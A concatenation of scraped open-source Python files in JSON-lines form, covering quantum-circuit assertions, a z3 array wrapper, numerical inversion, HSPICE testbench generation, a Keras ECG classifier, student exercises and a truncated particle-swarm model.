\"\"\"\n self._qubit0 = self._syntax_for_measure(qubit0)\n self._cbit0 = self._syntax_for_measure(cbit0)\n self._qubit1 = self._syntax_for_measure(qubit1)\n self._cbit1 = self._syntax_for_measure(cbit1)\n type_str = \"Not Product\" if negate else \"Product\"\n qubit0 = list(self._qubit0) if isinstance(self._qubit0, Register) else self._qubit0\n qubit1 = list(self._qubit1) if isinstance(self._qubit1, Register) else self._qubit1\n cbit0 = list(self._cbit0) if isinstance(self._cbit0, Register) else self._cbit0\n cbit1 = list(self._cbit1) if isinstance(self._cbit1, Register) else self._cbit1\n super().__init__(qubit0 + qubit1, cbit0 + cbit1, pcrit, negate, type_str)\n\n def stat_test(self, counts):\n \"\"\"\n Performs a chi-squared contingency test on the experimental outcomes.\n Internally, constructs a contingency table from the experimental counts.\n\n\n Args:\n counts(dictionary): result.get_counts(experiment)\n\n Returns:\n tuple: tuple containing:\n\n chisq(float): the chi-square value\n\n pval(float): the p-value\n\n passed(bool): if the test passed\n \"\"\"\n q0len = len(self._qubit0)\n q1len = len(self._qubit1)\n cont_table = np.ones((2 ** q0len, 2 ** q1len))\n\n for (key, value) in counts.items():\n key_rev = key[::-1]\n q0index = int(key_rev[:q0len], 2)\n q1index = int(key_rev[q0len:], 2)\n cont_table[q0index][q1index] = value\n\n chisq, pval, _, _ = chi2_contingency(cont_table)\n passed = bool(pval >= self._pcrit)\n return (chisq, pval, passed)\n\n\ndef get_breakpoint_product(self, qubit0, cbit0, qubit1, cbit1, pcrit=0.05):\n \"\"\"\n Creates a breakpoint, which is a renamed deep copy of the QuantumCircuit, and creates and\n appends an AssertProduct instruction to its end. It tests whether qubit0 and qubit1, measured\n to cbit0 and cbit1, have any entanglement between them. If the statistical test passes, the\n assertion passes; if the test fails, the assertion fails.\n\n Args:\n qubit0(QuantumRegister or list): quantum register\n cbit0(ClassicalRegister or list): classical register\n qubit1(QuantumRegister or list): quantum register\n cbit1(ClassicalRegister or list): classical register\n pcrit(float): critical p-value for the hypothesis test\n\n Returns:\n QuantumCircuit: copy of quantum circuit at the assert point\n \"\"\"\n clone = self.copy(Asserts._new_breakpoint_name())\n assertion = AssertProduct(qubit0, cbit0, qubit1, cbit1, pcrit, False)\n clone.append(assertion, [assertion._qubit], [assertion._cbit])\n return clone\n\n\nQuantumCircuit.get_breakpoint_product = get_breakpoint_product\n\n\ndef get_breakpoint_not_product(self, qubit0, cbit0, qubit1, cbit1, pcrit=0.05):\n \"\"\"\n Creates a breakpoint, which is a renamed deep copy of the QuantumCircuit, and creates and\n appends an AssertProduct instruction to its end. It tests whether qubit0 and qubit1, measured\n to cbit0 and cbit1, have any entanglement between them. If the statistical test passes, the\n assertion fails; if the test fails, the assertion passes.\n\n Args:\n qubit0(QuantumRegister or list): quantum register\n cbit0(ClassicalRegister or list): classical register\n qubit1(QuantumRegister or list): quantum register\n cbit1(ClassicalRegister or list): classical register\n pcrit(float): critical p-value for the hypothesis test\n\n Returns:\n QuantumCircuit: copy of quantum circuit at the assert point\n \"\"\"\n clone = self.copy(Asserts._new_breakpoint_name())\n assertion = AssertProduct(qubit0, cbit0, qubit1, cbit1, pcrit, True)\n clone.append(assertion, [assertion._qubit], [assertion._cbit])\n return clone\n\n\nQuantumCircuit.get_breakpoint_not_product = get_breakpoint_not_product\n","sub_path":"qiskit/assertions/assertproduct.py","file_name":"assertproduct.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"317613280","text":"import z3\n\nfrom copy import deepcopy\nfrom .bitvector import BV, BVV, BVExpr\nfrom .bool_expr import Bool, BoolV\n\n\nclass BVArray(object):\n \"\"\" Wrapper of z3's Array. Beware: this is not immutable, differently from z3 \"\"\"\n\n def __init__(self, name: str, index_width: int, value_width: int):\n assert index_width > 0\n assert value_width > 0\n\n self.name = name\n self.index_width = index_width\n self.value_width = value_width\n self._conc_store = {}\n self._z3obj = None\n self._z3objConcCache = None\n\n def __str__(self):\n return \" BV{val}] {name}>\".format(\n name=self.name,\n ind=self.index_width,\n val=self.value_width\n )\n\n def __repr__(self):\n return self.__str__()\n\n def simplify(self):\n if self._z3obj is None:\n return\n self._z3obj = z3.simplify(self._z3obj)\n\n @property\n def z3obj(self):\n if self._z3obj is not None:\n # symbolic mode\n return self._z3obj\n\n # concrete mode\n if self._z3objConcCache is not None:\n return self._z3objConcCache\n res = z3.Array(\n self.name,\n z3.BitVecSort(self.index_width),\n z3.BitVecSort(self.value_width)\n )\n for index in self._conc_store:\n res = z3.Store(\n res,\n z3.BitVecVal(index, self.index_width),\n self._conc_store[index].z3obj\n )\n self._z3objConcCache = res\n return res\n\n def _try_build_reduced_array(self, index_min, index_max):\n if self._z3obj is not None:\n # symbolic mode\n return self._z3obj\n if index_max - index_min >= 2**self.index_width:\n return self.z3obj\n\n res = z3.Array(\n self.name,\n z3.BitVecSort(self.index_width),\n z3.BitVecSort(self.value_width)\n )\n for i in range(index_min, index_max + 1):\n if i in self._conc_store:\n res = z3.Store(\n res,\n z3.BitVecVal(i, self.index_width),\n self._conc_store[i].z3obj\n )\n return res\n\n def _switch_to_symbolic(self):\n if self._conc_store is not None:\n assert self._z3obj is None\n self._z3obj = z3.Array(\n self.name,\n z3.BitVecSort(self.index_width),\n z3.BitVecSort(self.value_width)\n )\n for index in self._conc_store:\n self._z3obj = z3.Store(\n self._z3obj,\n z3.BitVecVal(index, self.index_width),\n self._conc_store[index].z3obj\n )\n\n self._conc_store = None\n\n def Store(self, index, value):\n if isinstance(index, int):\n index = BVV(index, self.index_width)\n else:\n assert index.size == self.index_width\n if isinstance(value, int):\n value = BVV(value, self.value_width)\n else:\n assert value.size == self.value_width\n\n # invalidate cache\n self._z3objConcCache = None\n\n if (\n isinstance(index, BVV) and\n self._conc_store is not None\n ):\n # concrete mode\n self._conc_store[index.value] = value\n else:\n # symbolic mode\n self._switch_to_symbolic()\n self._z3obj = z3.Store(\n self._z3obj,\n index.z3obj,\n value.z3obj\n )\n\n def ConditionalStore(self, index, value, cond):\n if isinstance(index, int):\n index = BVV(index, self.index_width)\n else:\n assert index.size == self.index_width\n if isinstance(value, int):\n value = BVV(value, self.value_width)\n else:\n assert value.size == self.value_width\n if isinstance(cond, bool):\n cond = BoolV(cond)\n\n if isinstance(cond, BoolV):\n if cond.value:\n self.Store(index, value)\n return\n\n if (\n self._conc_store is not None and\n isinstance(index, BVV) and\n index.value in self._conc_store and\n self._conc_store[index.value].eq(value)\n ):\n # the condition is symbolic, but the value is already in memory\n # we can safetely skip the store\n return\n\n self._switch_to_symbolic()\n self._z3obj = z3.If(\n cond.z3obj,\n z3.Store(\n self._z3obj,\n index.z3obj,\n value.z3obj\n ),\n self._z3obj\n )\n # this can be quite inefficient.\n # Let's try to simplfy the expression.\n self._z3obj = z3.simplify(self._z3obj)\n\n def Select(self, index: BV) -> BV:\n if isinstance(index, int):\n index = BVV(index, self.index_width)\n else:\n assert index.size == self.index_width\n\n if (\n isinstance(index, BVV) and\n self._conc_store is not None and\n index.value in self._conc_store\n ):\n # concrete mode\n return self._conc_store[index.value]\n\n # symbolic mode\n # no need to switch to symbolic mode! (is this right?)\n res = BVExpr(self.value_width,\n z3.Select(\n self._try_build_reduced_array(\n index.interval.low, index.interval.high),\n index.z3obj\n )\n )\n if (\n isinstance(index, BVV) and\n self._conc_store is not None\n ):\n # uninitialized read\n self._conc_store[index.value] = res\n return res\n\n def copy(self):\n new = BVArray(self.name, self.index_width, self.value_width)\n new._conc_store = deepcopy(self._conc_store)\n new._z3obj = self._z3obj\n\n return new\n\n def merge(self, other, merge_condition: Bool):\n assert self.name == other.name\n assert self.index_width == other.index_width\n assert self.value_width == other.value_width\n if isinstance(merge_condition, BoolV):\n if merge_condition.value:\n return other.copy()\n return self\n\n self._switch_to_symbolic()\n self._z3obj = z3.If(\n merge_condition.z3obj,\n other.z3obj,\n self._z3obj\n )\n # this can be quite inefficient.\n # Let's try to simplfy the expression.\n self._z3obj = z3.simplify(self._z3obj)\n return self\n","sub_path":"expr/bitvector_array.py","file_name":"bitvector_array.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"617472004","text":"import sys\nfrom collections import deque\nsys.stdin = open(\"./seung/input.txt\",\"r\")\nN,M = map(int,sys.stdin.readline().split())\n\nmatrix = [list(map(int,sys.stdin.readline().split())) for _ in range(N)]\n\n# 빙산을 다 넣는다.\n\ndef melt_iceberg():\n queue = deque([])\n visited = [[0] * M for _ in range(N)]\n queue.append(iceberg[0])\n visited[iceberg[0][0]][iceberg[0][1]] = 1\n\n melting_area = {}\n melted_ice_cnt = 0\n dx = [-1, 0, 1, 0] # 순서대로 좌, 상, 우, 하\n dy = [0, 1, 0, -1]\n while queue:\n melting_height = 0\n x,y = queue.popleft()\n melted_ice_cnt += 1\n for i in range(4):\n next_x = x + dx[i]\n next_y = y + dy[i]\n\n if 0 <= next_x < N and 0<= next_y 0:\n new_iceberg.append([i,j])\n return melted_ice_cnt, new_iceberg\n\nyear=0\n\n# 처음 만든 한 덩어리 빙산을 세팅\niceberg = []\nfor i in range(N):\n for j in range(M):\n if matrix[i][j]:\n iceberg.append((i, j))\n\nwhile True:\n cnt, new_ice = melt_iceberg()\n if cnt != len(iceberg): # 처음 만든 빙산에서 덩어리가 깨졌는지\n break\n if cnt == 0 or len(new_ice) == 0 :\n year= 0\n break\n\n iceberg = new_ice[:]\n year+=1\n\nprint(year)","sub_path":"seung/09_iceberg_re.py","file_name":"09_iceberg_re.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"391298129","text":"############################################################################\n# Copyright 2017 Albin Severinson #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n############################################################################\n\n'''Numerical function inversion\n\n'''\n\nimport math\n\nfrom functools import lru_cache, partial\n\ndef _find_limits(fun=None, target=None):\n '''bound the input needed to reach value'''\n assert callable(fun)\n assert target is not None\n value = 1\n while fun(value) < target:\n value *= 2\n return math.floor(value / 2), value\n\n@lru_cache()\ndef _bounds_wrap(value, fun=None, lower=None, upper=None):\n '''wrap a function with bounds checking'''\n if value < lower:\n return -float('inf')\n if value > upper:\n return float('inf')\n return fun(value)\n\ndef numinv(fun=None, target=None, lower=None, upper=None):\n '''numerically invert a discrete function\n\n args:\n\n fun: function to invert. must be monotonically increasing in the range\n lower to upper. use lambdas to wrap your function if this is not the case.\n\n target: target value\n\n lower: lower bound to search, < float('inf') or None to find automatically.\n\n upper: upper bound to search, >= 0, or None to find automatically.\n\n returns: value such that fun(value) <= target < fun(value+1).\n\n '''\n assert callable(fun)\n assert target is not None\n assert 0 <= target < float('inf')\n if lower is None or upper is None:\n find_bounds = True\n else:\n find_bounds = False\n if lower is None:\n lower = 0\n if upper is None:\n upper = float('inf')\n\n # wrap fun with bounds checking\n ffun = partial(_bounds_wrap, fun=fun, lower=lower, upper=upper)\n\n # find upper and lower bounds\n if find_bounds:\n lower, upper = _find_limits(ffun, target)\n\n # binary search\n while upper - lower > 1:\n middle = math.floor(lower + (upper - lower) / 2)\n if ffun(middle) >= target:\n upper = middle\n else:\n lower = middle\n\n # return whichever is closest and lower if it is a tie\n if abs(ffun(lower) - target) <= abs(ffun(upper) - target):\n return lower\n else:\n return upper\n\ndef cnuminv(fun=None, target=None, lower=None, upper=None, ytol=None, xtol=None, tol=1e-7):\n '''numerically invert a continuous function\n\n args:\n\n fun: function to invert. must be monotonically increasing in the range\n lower to upper. use lambdas to wrap your function if this is not the case.\n\n target: target value\n\n lower: lower bound to search, < math.inf or None to find automatically.\n\n upper: upper bound to search, >= 0, or None to find automatically.\n\n xtol: function input tolerance.\n\n ytol: function output tolerance.\n\n tol: sets both xtol and ytol\n\n returns: value such that value-tol < target and value+tol > target.\n\n '''\n assert callable(fun)\n assert target is not None\n assert 0 <= target < math.inf\n if xtol is not None or ytol is not None:\n assert tol is None, 'tol and xtol/ytol cannot be used at the same time'\n if tol is not None:\n assert xtol is None and ytol is None, 'tol and xtol/ytol cannot be used at the same time'\n if ytol is None:\n ytol = tol\n if xtol is None:\n xtol = tol\n assert 0 < xtol < math.inf\n assert 0 < ytol < math.inf\n if lower is None or upper is None:\n find_bounds = True\n else:\n find_bounds = False\n if lower is None:\n lower = 0\n if upper is None:\n upper = math.inf\n\n # wrap fun with bounds checking\n ffun = partial(_bounds_wrap, fun=fun, lower=lower, upper=upper)\n\n # find upper and lower bounds\n if find_bounds:\n lower, upper = _find_limits(ffun, target)\n\n # binary search\n x = lower + (upper - lower) / 2\n while True:\n y = ffun(x)\n if abs(y-target) <= ytol and (upper - lower) <= xtol:\n break\n if y >= target:\n upper = x\n else:\n lower = x\n x = lower + (upper - lower) / 2\n\n return x\n","sub_path":"pynumeric/pynumeric.py","file_name":"pynumeric.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"509315836","text":"#==== tbrf generation =======\n\nimport HSPICE_mds\n#==============================================================\n# v3 receives only nominal frequency, but receive vdd,temp, use [0]\n# it receives design parameters as dm\n# only generates tbrf for the ones are in \"result_exist\"\n#==============================================================\ndef gen_tbrf_v3(PDK,format_dir,tbrf_dir,dm,freq,result_exist,vdd,temp):\n\tr_file=open(format_dir+\"/form_tbrf_ring_osc.sp\",\"r\")\n\tlines=list(r_file.readlines())\n\tfor nd in result_exist:\n\t\tN_fc=dm[nd][3]\t \n\t\tN_cc=dm[nd][1]\t\n\t\tN_drv=dm[nd][0]\n\t\tN_stg=dm[nd][2]\n\t\tN_ctrl_fc=N_stg*N_fc\n\t\tN_ctrl_cc=N_stg*N_cc\n\t\tper_tmp=1/freq[nd][0][0] #nominal freq, nominal temp\n\t\tfreq_tmp=freq[nd][0][0]\n\t\tnetmap1=HSPICE_mds.netmap() #35\n\t\tnetmap1.get_net('ff',None,freq_tmp,freq_tmp,1)\n\t\tnetmap1.get_net('ht',None,50*per_tmp,50*per_tmp,1)\n\t\tnetmap1.get_net('nd',None,N_drv,N_drv,1)\n\t\tnetmap1.get_net('nm',None,N_cc,N_cc,1)\n\t\tnetmap1.get_net('nt','sc',N_stg,N_stg,1)\n\t\tnetmap1.get_net('nf',None,N_fc,N_fc,1)\n\t\t#----- only string -----------\n\t\tnetmap1.get_net('PK',PDK,None,None,None)\n\t\t#----- lateral stuffs --------\n\t\tnetmap1.get_net('vf','vf',0,N_ctrl_fc-1,1)\n\t\tnetmap1.get_net('vc','vc',0,N_ctrl_cc-1,1)\n\t\tnetmap1.get_net('vd',None,vdd[0],vdd[0],1)\n\t\tnetmap1.get_net('tm',None,temp[0],temp[0],1)\n\t\tnetmap1.get_net('f1',None,'d2o',N_ctrl_fc,N_ctrl_fc//2)\n\t\tnetmap1.get_net('c1',None,'d2o',N_ctrl_cc,N_ctrl_cc//2)\n\t\twith open(tbrf_dir+\"/tbrf_%dring%d_osc%d_fc%d.sp\"%(N_drv,N_cc,N_stg,N_fc),\"w\") as w_file:\n\t\t\tfor line in lines:\n\t\t\t netmap1.printline(line,w_file)\n\t\t\tprint(\"tbrf nstg=%d\"%(N_stg))\n\n\n#==============================================================\n# v2 receives only nominal frequency\n# it receives design parameters as lists\n# only generates tbrf for the ones are in \"result_exist\"\n#==============================================================\ndef gen_tbrf_v2(ncell,ndrv,nfc,nstg,freq,result_exist):\n\tr_file=open(\"./formats/form_tbrf_ring_osc.sp\",\"r\")\n\tlines=list(r_file.readlines())\n\tprint (\"result_exist\"),\n\tprint (result_exist)\n\tfor nd in result_exist:\n\t\ti=nd+1 #ncell[0]='ncell'\n\t\tNCC=ncell[i]\n\t\tNDRV=ndrv[i]\n\t\tNFC=nfc[i]\n\t\tNSTG=nstg[i]\n\t\tN_ctrl_fc=NSTG*NFC\n\t\tN_ctrl_cc=NSTG*NCC\n\t\t#print freq[nd]\n\t\tper_tmp=1/freq[nd][0][0] #nominal freq, nominal temp\n\t\tfreq_tmp=freq[nd][0][0]\n\t\t#print per_tmp \n\t\tnetmap1=HSPICE_mds.netmap() #35\n\t\tnetmap1.get_net('ff',None,freq_tmp,freq_tmp,1)\n\t\tnetmap1.get_net('ht',None,50*per_tmp,50*per_tmp,1)\n\t\tnetmap1.get_net('nd',None,NDRV,NDRV,1)\n\t\tnetmap1.get_net('nm',None,NCC,NCC,1)\n\t\tnetmap1.get_net('nt','sc',NSTG,NSTG,1)\n\t\tnetmap1.get_net('nf',None,NFC,NFC,1)\n\t\t#----- lateral stuffs --------\n\t\tnetmap1.get_net('vf','vf',0,N_ctrl_fc-1,1)\n\t\tnetmap1.get_net('vc','vc',0,N_ctrl_cc-1,1)\n\t\tnetmap1.get_net('f1',None,'d2o',N_ctrl_fc,N_ctrl_fc//2)\n\t\tnetmap1.get_net('c1',None,'d2o',N_ctrl_cc,N_ctrl_cc//2)\n\t\twith open(\"./HSPICE/TBrf_v2/tbrf_%dring%d_osc%d_fc%d.sp\"%(NDRV,NCC,NSTG,NFC),\"w\") as w_file:\n\t\t\tfor line in lines:\n\t\t\t netmap1.printline(line,w_file)\n\t\t\tprint(\"tbrf nstg=%d\"%(NSTG))\n\t\t\n\n\ndef gen_tbrf(ncell,ndrv,nfc,nstg_start,nstg_end,nstg_step,freq_cc,fcidx):\n\n\tvm1=HSPICE_mds.varmap() ###modify here!!\n\tvm1.get_var('ncell',ncell,ncell,1)\n\tvm1.get_var('nstage',nstg_start,nstg_end,nstg_step)\n\tvm1.get_var('ndrive',ndrv,ndrv,1)\n\tvm1.get_var('nfc',nfc,nfc,1)\n\tvm1.cal_nbigcy()\n\tvm1.combinate()\n\tnum_var=1\n\n\tr_file=open(\"./formats/form_tbrf_ring_osc.sp\",\"r\")\n\tlines=list(r_file.readlines())\n\t\n\t\n\tfor i in range(1,len(vm1.comblist[0])):\n\t\tfor cc, freq in freq_cc[i-1].iteritems():\n\t\t\tper=1/freq\n\t\t\t#print per \n\t\t\t#w_file=open(\"./HSPICE/TBrf/tbrf_%dring%d_osc%d_cc%d_nf%d.sp\"%(vm1.comblist[2][i],vm1.comblist[0][i],vm1.comblist[1][i],cc,nfc),\"w\")\n\t\t\tnetmap1=HSPICE_mds.netmap() #35\n\t\t\tnetmap1.get_net('ff',None,freq,freq,1)\n\t\t\tnetmap1.get_net('ht',None,50*per,50*per,1)\n\t\t\tnetmap1.get_net('nd',None,vm1.comblist[2][i],vm1.comblist[2][i],1)\n\t\t\tnetmap1.get_net('nm',None,vm1.comblist[0][i],vm1.comblist[0][i],1)\n\t\t\tnetmap1.get_net('nt','sc',vm1.comblist[1][i],vm1.comblist[1][i],1)\n\t\t\tnetmap1.get_net('nf',None,vm1.comblist[3][i],vm1.comblist[3][i],1)\n\t\t\t#netmap1.get_net('nf',None,nfc,nfc,1)\n\t\t\t#----- lateral stuffs --------\n\t\t\tnetmap1.get_net('vf','vf',0,nfc-1,1)\n\t\t\tnetmap1.get_net('vc','vc',0,ncell-1,1)\n\t\t\tnetmap1.get_net('f1',None,'d2o',nfc,fcidx)\n\t\t\tnetmap1.get_net('c1',None,'d2o',ncell,cc)\n\t\t\twith open(\"./HSPICE/TBrf/tbrf_%dring%d_osc%d_cc%d.sp\"%(vm1.comblist[2][i],vm1.comblist[0][i],vm1.comblist[1][i],cc),\"w\") as w_file:\n\t\t\t\tfor line in lines:\n\t\t\t\t netmap1.printline(line,w_file)\n\t\t\t\tprint(\"tbrf nstg=%d\"%(i+nstg_start-1))\n","sub_path":"generators/pll-gen/pymodules/HSPICE_tbrf.py","file_name":"HSPICE_tbrf.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"399916737","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/tests/test_repository.py\n# Compiled at: 2014-10-22 16:00:16\n__docformat__ = 'reStructuredText'\n__author__ = 'Antonio Messina '\nimport os, shutil, tempfile, unittest, nose.tools as nt\nfrom elasticluster.repository import ClusterRepository, MemRepository\n\nclass FakeCluster(object):\n \"\"\"Fake class used for the storage cluster class. The only thing the\n ClusterRepository class assumes is that the saved class has a `name`\n attribute.\n \"\"\"\n\n def __init__(self, name='fake_cluster'):\n self.name = name\n self.nodes = {}\n\n def __eq__(self, other):\n return self.name == other.name\n\n\nclass MemRepositoryTests(unittest.TestCase):\n\n def setUp(self):\n self.storage = MemRepository()\n\n def test_get_all(self):\n clusters = [ FakeCluster('test_%d' % i) for i in range(10) ]\n for cluster in clusters:\n self.storage.save_or_update(cluster)\n\n new_clusters = self.storage.get_all()\n for cluster in new_clusters:\n nt.assert_true(cluster in clusters)\n\n def test_get(self):\n clusters = [ FakeCluster('test_%d' % i) for i in range(10) ]\n for cluster in clusters:\n self.storage.save_or_update(cluster)\n\n new_clusters = [ self.storage.get(cluster.name) for cluster in clusters ]\n for cluster in new_clusters:\n nt.assert_true(cluster in clusters)\n\n def test_delete(self):\n cluster = FakeCluster('test1')\n self.storage.save_or_update(cluster)\n nt.assert_true(cluster.name in self.storage.clusters)\n self.storage.delete(cluster)\n nt.assert_false(cluster.name in self.storage.clusters)\n\n\nclass ClusterRepositoryTests(MemRepositoryTests):\n\n def setUp(self):\n self.path = tempfile.mkdtemp()\n self.storage = ClusterRepository(self.path)\n\n def tearDown(self):\n shutil.rmtree(self.path, ignore_errors=True)\n del self.storage\n\n def test_delete(self):\n pass\n\n def test_save_and_delete(self):\n cluster = FakeCluster('test1')\n self.storage.save_or_update(cluster)\n clusterpath = os.path.join(self.path, 'test1.pickle')\n nt.assert_true(os.path.exists(clusterpath))\n self.storage.delete(cluster)\n nt.assert_false(os.path.exists(clusterpath))\n\n\nif __name__ == '__main__':\n import nose\n nose.runmodule()","sub_path":"pycfiles/elasticluster-1.2-py2.7/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"226237807","text":"#Zadatak:\n#Unijeti n stringova u niz Y i niz X\n#Stvoriti niz Z i u njemu povezati stringove nizova\n\n\nn = int(input(\"Unesite veličinu niza: \"))\nwhile n<1:\n n = int(input(\"Unesite veličinu niza: \"))\n\nnizx = [0]*n\nnizy = [0]*n\nnizz = [0]*n\nfor i in range(n):\n num = input(\"Unesite riječ za X niz: \")\n nizx[i] = num\n\nprint(\"\")\nfor i in range(n):\n word = input(\"Unesite riječ za Y niz: \")\n nizy[i] = word\n\nfor i in range(n):\n nizz[i] = nizx[i]+nizy[i]\n\nprint(nizz)\n \n \n","sub_path":"Programiranje/Stringovi/GoranCaljkusic_0.py","file_name":"GoranCaljkusic_0.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446362717","text":"\"\"\"\n'Kaotic Hegemony' copyright 2012\n\nBased off one of my favorite games from the early 90s.\nCode is licensed by GPL and can be used freely.\nCredit is appreciated but not mandatory.\n\nPlease do not use any of the artwork in other projects.\nNo warranty expressed or implied.\n\n-Written by Sean J. McKiernan 'Mekire'\n\"\"\"\n\nif __name__ == '__main__':\n import data.main\n Runner = data.main.Control()\n Runner.main()\n","sub_path":"Tutoriales-Ejemplos/Ejemplos/ChaoticHegemony-0.06/chaotic_hegemony.py","file_name":"chaotic_hegemony.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"341466350","text":"import numpy as np\nfrom keras.models import load_model\n# keras imports\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Input, Conv1D, Dropout, Flatten, Dense, MaxPooling1D, Activation, GlobalAveragePooling1D, BatchNormalization\nfrom keras.callbacks import EarlyStopping\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras.callbacks import Callback,warnings\nimport keras.utils as np_utils\n\nimport tensorflow as tf \n\ndef cnn_net(window_size):\n\t# parameters\n\tinput_feat = 1\n\toutput_feat = 4\n\n\tconvfilt = 128 \t\t# number of neurons\n\tconvstr = 1 \t\t# no idea what it does \n\tksize = 5\t\t\t# kernel width\t\n\tdropout = 0.20\t\t# dropout probability\n\n\tpoolsize = 2\n\tpoolstr = 2\n\n\t# input layer\n\tinput1 = Input(shape=(window_size, input_feat), name='input1')\n\n\t# first convolution layer conv(relu)->maxpooling->dropout\n\tx = Conv1D(filters=convfilt,\n\t\t\t\t kernel_size=ksize,\n\t\t\t\t padding='same',\n\t\t\t\t strides=convstr,\n\t\t\t\t kernel_initializer='he_normal')(input1)\n\tx = BatchNormalization()(x)\n\tx = Activation('relu')(x)\n\tx = MaxPooling1D(pool_size=poolsize,\n\t\t\t\t\t\tstrides=poolstr)(x)\n\t#x = Dropout(dropout)(x)\n\n\t# other 6 convolution layers conv(relu)->maxpooling->dropout\n\tfor i in range(6):\n\t\tx = Conv1D(filters=convfilt,\n\t\t\t\t\t kernel_size=ksize,\n\t\t\t\t\t padding='same',\n\t\t\t\t\t strides=convstr,\n\t\t\t\t\t kernel_initializer='he_normal')(x)\n\t\tx = BatchNormalization()(x)\n\t\tx = Activation('relu')(x)\n\t\tx = MaxPooling1D(pool_size=poolsize,\n\t\t\t\t\t\t\tstrides=poolstr)(x)\n\t\t#x = Dropout(dropout)(x)\n\n\tx = GlobalAveragePooling1D()(x)\n\n\t# not sure about this step\n\t#x = Flatten()(x)\n\n\t# dense layers\n\tx = Dense(256, activation='relu')(x)\n\tx = Dropout(dropout)(x)\n\tx = Dense(128, activation='relu')(x)\n\tx = Dropout(dropout)(x)\n\tx = Dense(64, activation='relu')(x)\n\tx = Dropout(dropout)(x)\n\n\t# output\n\tout = Dense(output_feat, activation='softmax')(x)\n\tmodel = Model(inputs=input1, outputs=out)\n\n\tmodel.compile(optimizer='adam',\n\t\t\t\t loss='categorical_crossentropy',\n\t\t\t\t metrics=['accuracy'])\n\treturn model\n\n# Load data\nX_test = np.load('./data/Xt_bw.npy')\n\n# Parameters\nFS = 300\nmaxlen = 30*FS\n\n'''\n# Preprocessing data\nn_samples, n_features = X_test.shape\ndata = np.zeros((n_samples, n_features))\nfor i in range(n_samples):\n x = X_test[i,:]\n x = x - np.mean(x)\n x = x / np.std(x)\n data[i,:] = x\ndata = np.expand_dims(data, axis=2)\n'''\nmodel = load_model('128_conv_7_dense_3.h5')\n\n#model1 = cnn_net(maxlen)\n#model1.load_weights('weights.h5')\n\ndata = np.expand_dims(X_test, axis=2)\n\nprint(\"Applying model ..\") \nprob = model.predict(data)\nnp.savetxt('./data/y_test_conv.csv', prob, fmt='%0.2f')\n","sub_path":"project3_test/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"632006283","text":"#===============================================================================\n# @author: Yu Bao rewrited\n# @organization: CUMT, School of Computer Science, 2017\n#\n#\n# This package contains representations of the following models:\n# 'Particle' - an atomic element\n# 'Swarm' - a set of particles\n# 'Neighbourhood' - particles topology\n# 'KnapsackSolution' - representation for solution of the problem\n# 'TSPSolution' - representation for solution of the problem\n#===============================================================================\n\n\n\n#===============================================================================\n# GENERIC MODELS\n#===============================================================================\nfrom ObjectiveFunction import OBJFUN\nimport numpy as np\nimport scipy.spatial as spp\nimport matplotlib.pyplot as plt\n\n#---- Particle representation\nclass ParticleModel:\n _position = None\n _velocity = None\n _bestPosition = None\n _nbBestPosition = None\n _fitness = None\n _bestfitness = None\n _objfun = None\n _typerange = None\n _nbbestfitness = None\n _bestfitness = None\n\n def __init__(self,objectfun):\n self._position = None #最佳组合\n self._velocity = None #变换速度\n self._bestPosition = None #历史最佳\n self._nbBestPosition = None #全局最佳\n self._fitness = None #适应度\n self._bestfitness =None #历史最佳的适应度\n self._nbbestfitness = None #global最佳的适应度\n self._objfun=OBJFUN(objectfun) #目标函数\n self.dim=None\n\n\n def initparas(self,w,c1,c2,r1,r2):\n self.w=w\n self.c1=c1\n self.c2=c2\n self.r1=r1\n self.r2=r2\n\n def initParticle(self, dimensions,truckset):\n self.dim=dimensions\n self._typerange=len(truckset)\n self._objfun.setParas(truckset,len(truckset))\n # Create position array\n self._position = np.random.randint(0,self._typerange, size = dimensions)\n\n if self._position.max()>self._typerange: #生成数字是否错误?\n print(\"bigger than 2\")\n quit()\n # Create Velocity array\n self._velocity = np.random.randint(0,self._typerange, size = dimensions)\n # Save best Position so far as current Position\n self._bestPosition = self._position\n self.updateFitness()\n\n def updateFitness(self):\n # Get Differences of vector ??????\n #hdist = spp.distance.hamming(self._position, self._solution) #计算海明距离\n hdist=self._objfun.getobjectfunvalue(self._position)\n #print(hdist)\n self._fitness=hdist\n # Save it as best position if its better than previous best\n if self._bestfitness is None:\n self._bestfitness=hdist\n if hdist < self._bestfitness:\n self._bestPosition = np.copy(self._position)\n self._bestfitness = hdist\n\n\n def updatePosition(self):\n # VELOCITY NEEDS TO BE CONSTRICTED WITH VMAX\n # Get random coefficients e1 & e2\n # c = 